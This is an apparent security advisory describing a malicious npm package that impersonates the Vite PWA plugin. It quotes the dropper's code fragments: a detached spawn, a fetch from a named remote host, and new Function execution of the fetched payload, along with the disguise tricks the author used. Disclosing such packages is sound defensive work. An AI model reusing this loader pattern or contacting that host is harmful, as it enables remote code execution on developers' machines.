MAL-2026-5936

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (d52d1d84d7572baf6a74539864b64d5b5c803f828fc82a1dae4de2dfebdb986f) Package impersonates the legitimate `vite-plugin-pwa` (cloned description 'Zero-config PWA for Vite', repository `vite-pwa/vite-config-field`, funding link to `github.com/sponsors/antfu`, and exports matching the upstream API including `VitePWA`, `cachePreset`, and `configField`). When a consumer adds the plugin to their Vite config and the exported `configField()` runs, it invokes `getUseropt()` which calls `child_process.spawn('node', ['./client/dev/reactopt.js',...], { detached: true, stdio: 'ignore' })` and unrefs the child. The spawned `dist/client/dev/reactopt.js` performs `axios.get('https://www.jsonkeeper.com/b/HIECD', { headers: { 'x-secret-key': '_' } })`, takes `response.data.Cookie`, and executes it with `new Function('require', s)(require)` — arbitrary remote code execution with full `require` capability, retrying 5 times. The C2 URL is disguised inside a fake `process.env` object (`DEV_API_KEY`/`DEV_SECRET_KEY`/`DEV_SECRET_VALUE`) to masquerade as environment-variable reads, and console output is silenced around the eval. The detached, stdio-ignored child means the dropper survives independent of the parent build/dev process.